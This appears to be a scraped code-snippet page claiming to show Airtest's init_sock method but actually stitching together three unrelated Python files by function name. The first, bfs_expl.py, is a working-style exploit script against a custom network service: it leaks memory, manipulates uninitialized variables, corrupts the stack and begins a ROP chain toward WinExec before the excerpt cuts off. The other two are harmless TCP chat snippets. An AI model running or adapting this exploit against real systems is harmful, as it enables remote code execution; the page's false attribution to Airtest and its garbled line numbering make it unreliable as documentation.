How to use init_sock method in Airtest

Best Python code snippet using Airtest

bfs_expl.py

Source:bfs_expl.py Github

copy

Full Screen

...7#PAYLOAD_SIZE = 0xF00-0x14 8CONNECTION_COUNT = 09def tohex(val, nbits):10 return hex((val + (1 << nbits)) % (1 << nbits))11def init_sock(bWait=True, iTime=0.2):12 global CONNECTION_COUNT13 s = socket.socket()14 #s.settimeout(3000)15 s.connect(("192.168.213.128", 12321))16 CONNECTION_COUNT = CONNECTION_COUNT + 117 if bWait:18 time.sleep(iTime)19 return s20def echo_hello(msg):21 print("sending hello msg")22 #t = random.uniform(0, 1.5)23 s = init_sock(True)24 25 data = msg 26 27 data_size = len(data)28 header = b'BFS.' + struct.pack("<L", data_size)29 time.sleep(random.random()+1)30 s.send(header)31 time.sleep(random.random()+1)32 s.send(data)33 time.sleep(random.random()+1)34 buff = s.recv(0x1000)35 if len(buff) == data_size:36 print(buff)37 38 time.sleep(random.random()+1)39 s.close()40 41 return buff42 43def leak_data():44 s = init_sock()45 46 data = b'\x90' * 0xD047 data += b'AAAABBBBCCCCDDDDEEEEFFFFHHHHIIIIJJJJKKKKLLLL'48 data += struct.pack("<L", 0x00000F00)49 # g_stack_depth (DWORD) 50 # g_stack_array (QWORD ARRAY: E1, E2)51 data_size = len(data)52 header = b'BFS.' + struct.pack("<L", 0xFF)53 s.send(header)54 s.send(data)55 s.recv(0x1000)56 s.close()57 58 s = init_sock()59 60 data = b'\x90' * 0xD0 61 data_size = len(data)62 #print(data_size)63 header = b'BFS.' + struct.pack("<L", 0x100)64 s.send(header)65 s.send(data)66 buff = s.recv(0x1000)67 #print(buff)68 s.close() 69 70 return buff[0x100:]71def clean_uninit(): 72 s = init_sock()73 data = b'\x00' * 0x10074 data_size = len(data)75 76 header = b'BFS.' + struct.pack("<L", 0xFF)77 s.send(header)78 time.sleep(random.random()+0.1)79 s.send(data)80 time.sleep(random.random()+0.1)81 buff = s.recv(0x1000)82 s.close()83 84def clean_uninit2():85 s = init_sock()86 data = b'\x90' * 0xD087 data += b'AAAABBBBCCCCDDDDEEEEFFFFHHHHIIIIJJJJKKKKLLLL'88 data += struct.pack("<L", 0x00000000)89 # g_stack_depth (DWORD) 90 # g_stack_array (QWORD ARRAY: E1, E2)91 data_size = len(data)92 #print(data_size)93 header = b'BFS.' + struct.pack("<L", 0xFF)94 s.send(header)95 time.sleep(random.random()+0.1)96 s.send(data)97 time.sleep(random.random()+0.1)98 buff = s.recv(0x1000)99 s.close()100def get_msg():101 data = b'https://distintas.net/camila-nicole'102 #padding = b"0x61" * random.randint(0, 0xD0 - len(data))103 #msg = data + padding104 return data105 106def confirm_cleanup():107 print("Attempting to clean the uninit var")108 109 resp = echo_hello(get_msg())110 111 while len(resp) > 0x200:112 print("cleanup-1")113 clean_uninit()114 115 print("cleanup-2")116 clean_uninit2() 117 118 try: 119 resp = echo_hello(get_msg())120 except:121 pass122 123def prepare_for_corruption():124 #for i in range(2):125 s = init_sock()126 data = b'\x90' * 0xD0127 data += b'AAAABBBBCCCCDDDDEEEEFFFFHHHHIIIIJJJJKKKKLLLL'128 data += struct.pack("<L", 0x0000014 + PAYLOAD_SIZE)129 # g_stack_depth (DWORD) 130 # g_stack_array (QWORD ARRAY: E1, E2)131 data_size = len(data)132 #print(data_size)133 header = b'BFS.' + struct.pack("<L", 0xFF)134 s.send(header)135 time.sleep(0.2)136 s.send(data)137 time.sleep(0.2)138 s.recv(0x1000)139 s.close()140 141 142def prepare_for_socket_leak(): 143 s = init_sock()144 data = b'\xFF' * 0xD0145 data += b'AAAABBBBCCCCDDDDEEEEFFFFHHHHIIIIJJJJKKKKLLLL'146 # 0x21 coz 0xFF is what we're sending in the header147 data += struct.pack("<L", 0x000020) # uninit val 148 # g_stack_depth (DWORD) 149 # g_stack_array (QWORD ARRAY: E1, E2)150 data_size = len(data)151 #print(data_size)152 header = b'BFS.' + struct.pack("<L", 0xFF)153 s.send(header)154 s.send(data)155 #print(s.recv(0x1000))156 s.close()157 158 159def clean2():160 161 for i in range(2):162 s = init_sock()163 data = b'\x90' * 0x100164 165 # g_stack_depth (DWORD) 166 # g_stack_array (QWORD ARRAY: E1, E2)167 data_size = len(data)168 #print(data_size)169 header = b'BFS.' + struct.pack("<L", 0x100)170 s.send(header)171 s.send(data)172 buff = s.recv(0x1000)173 s.close()174 175 for i in range(2):176 s = init_sock()177 data = b'\x90' * 0x10178 179 # g_stack_depth (DWORD) 180 # g_stack_array (QWORD ARRAY: E1, E2)181 data_size = len(data)182 #print(data_size)183 header = b'BFS.' + struct.pack("<L", 0x1000)184 s.send(header)185 s.send(data)186 buff = s.recv(0x1000)187 s.close()188 189 190 for i in range(2):191 s = init_sock()192 data = b'\x90' * 0xD0193 data += b'AAAABBBBCCCCDDDDEEEEFFFFHHHHIIIIJJJJKKKKLLLL'194 data += struct.pack("<L", 0x00000000)195 # g_stack_depth (DWORD) 196 # g_stack_array (QWORD ARRAY: E1, E2)197 data_size = len(data)198 #print(data_size)199 header = b'BFS.' + struct.pack("<L", 0xFF)200 s.send(header)201 s.send(data)202 buff = s.recv(0x1000)203 s.close()204 205 206def leak_socket():207 s = init_sock()208 209 data = b'C' * 0x100210 data += struct.pack("<L", 0xFFFFFF01) # This is for uninit and also for g_stack_depth211 data += b'C' * (0x120 - len(data))212 213 data_size = len(data)214 header = b'BFS.' + struct.pack("<L", 0x100)215 s.send(header) 216 s.send(data)217 hexdump.hexdump(s.recv(0x1000))218 s.close()219def exploit(bfsc_base, winexec_addr):220 global CONNECTION_COUNT221 s = init_sock()222 223 # ROP HERE (0x100 max!) (or less) -> change the space above224 FILLER = b'\xEE\xEE\xEE\xEE\xEE\xEE\xEE\xEE'225 data = b'\xCC' * 0x100 # SIZE SPECIFIED IN THE HEADER226 227 228 data += struct.pack("<L", 0xFFFFFF01)229 data += struct.pack("<Q", 0xC4F3B4B3C4F3B4B3)230 231 #data += struct.pack("<Q", 0x4242424242424242)232 233 234 rop = struct.pack("<Q", bfsc_base + 0x684D) # pop rbx ; ret235 ...

Full Screen

Full Screen

client.py

Source:client.py Github

copy

Full Screen

...4import time5import threading6import traceback7from utils.dict import MSG_TEMPLATE, PRESENSE, QUIT8def init_sock():9 """ 10 Initializate tcp/id socket11 """12 s = socket(AF_INET, SOCK_STREAM)13 s.connect(('', 7777))14 return s15T16def receiver(sock):17 """18 start receiver thread19 """20 while True:21 try:22 message = sock.recv(1024)23 message = pickle.loads(message)24 print('from: ',message)25 except Exception as e:26 print('Client error: ', traceback.format_exc())27 sock.close()28 break29def writer(sock):30 """31 start writer thread32 """33 while True:34 message = f'alie: {input()}'35 sock.send(pickle.dumps(message))36def main(sock):37 """38 Start all threads39 """40 write_thread = threading.Thread(target=receiver, args=(sock,))41 write_thread.start()42 receiver_thread = threading.Thread(target=writer, args=(sock,))43 receiver_thread.start()44if __name__ == '__main__':...

Full Screen

Full Screen

tcpServer.py

Source:tcpServer.py Github

copy

Full Screen

...5 self.addr = (host, port)6 self.buffer = buffer7 self.tcpSocket = None8 9 def init_sock(self):10 self.tcpSocket = socket(AF_INET, SOCK_STREAM)11 self.tcpSocket.bind(self.addr)12 self.tcpSocket.listen(20)13 def communicate(self):14 try:15 while True:16 client_sock , client_addr = self.tcpSocket.accept()17 print('conncet from %s' % (client_addr,))18 while True:19 data = client_sock.recv(self.buffer)20 if not data:21 client_sock.close()22 print('connect end')23 break24 client_sock.send('[%s] : %s' % (ctime(), 'hello'))25 #client_sock.close()26 except (EOFError, KeyboardInterrupt): 27 self.tcpSocket.close()28if __name__ == '__main__':29 ts = TCPServer()30 ts.init_sock()31 ts.communicate()...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run Airtest automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful